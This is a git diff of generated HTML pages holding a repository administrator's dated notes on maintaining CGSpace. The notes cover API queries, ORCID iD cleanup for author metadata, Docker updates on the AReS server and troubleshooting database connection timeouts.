                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    -H 'Content-Type: application/json' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    -d '{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    "size": 10,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    "query": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -        "bool": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -            "filter": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -                "term": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -                    "repo.keyword": "CGSpace"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -                }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -            }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    -H 'Content-Type: application/json' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    -d '{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    "size": 10,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    "query": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +        "bool": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +            "filter": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +                "term": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +                    "repo.keyword": "CGSpace"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +                }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +            }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • This uses the Elasticsearch scroll ID to page through results
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • The second query doesn’t need the request body because it is saved for 1 day as part of the first request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -525,46 +525,46 @@ $ curl -X POST 'https://cgspace.cgiar.org/explor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -1331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +1331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • After I combined them and removed duplicates, I resolved all the names using my resolve-orcids.py script:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Tag existing items from the Alliance’s new authors with ORCID iDs using add-orcid-identifiers-csv.py (181 new metadata fields added):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ cat 2021-08-25-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Jager M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304" 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-08-29

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ cat 2021-08-25-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Jager M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304" 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-08-29

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Run a full harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Also do more work the past few days on OpenRXV diff --git a/docs/2021-09/index.html b/docs/2021-09/index.html index fb47a7162..44d1046f8 100644 --- a/docs/2021-09/index.html +++ b/docs/2021-09/index.html @@ -48,7 +48,7 @@ The syntax Moayad showed me last month doesn’t seem to honor the search qu "/> - + @@ -154,9 +154,9 @@ The syntax Moayad showed me last month doesn’t seem to honor the search qu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Update Docker images on AReS server (linode20) and rebuild OpenRXV:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then run system updates and reboot the server
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • After the system came back up I started a fresh re-harvesting
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -201,8 +201,8 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Looking at the PDF’s metadata I see:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Producer: iLovePDF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -236,11 +236,11 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ cat 2021-09-15-add-orcids.csv                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ cat 2021-09-15-add-orcids.csv                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -273,42 +273,42 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • But the DSpace log file shows tons of database issues:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -14779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +14779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • The earliest one I see is around midnight (now is 2PM):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-09-17 00:01:49,572 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2021-09-17 00:01:49,572 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • But I was definitely logged into the site this morning so there were no issues then…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • It seems that a few errors are normal, but there’s obviously something wrong today:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-01:116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-02:163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-03:77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-04:13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-05:310
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-06:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-07:29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-08:86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-09:24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-10:26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-11:12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-12:5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-13:10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-14:102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-15:542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-16:368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-17:15235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-01:116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-02:163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-03:77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-04:13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-05:310
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-06:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-07:29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-08:86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-09:24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-10:26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-11:12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-12:5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-13:10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-14:102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-15:542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-16:368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-17:15235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I restarted the server and DSpace came up fine… so it must have been some kind of fluke
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Continue working on cleaning up and annotating the metadata registry on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -338,9 +338,9 @@ dspace.log.2021-09-17:15235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-20

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-20

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I synchronized the production CGSpace PostreSQL, Solr, and Assetstore data with DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Over the weekend a few users reported that they could not log into CGSpace @@ -349,10 +349,10 @@ $ docker-compose build
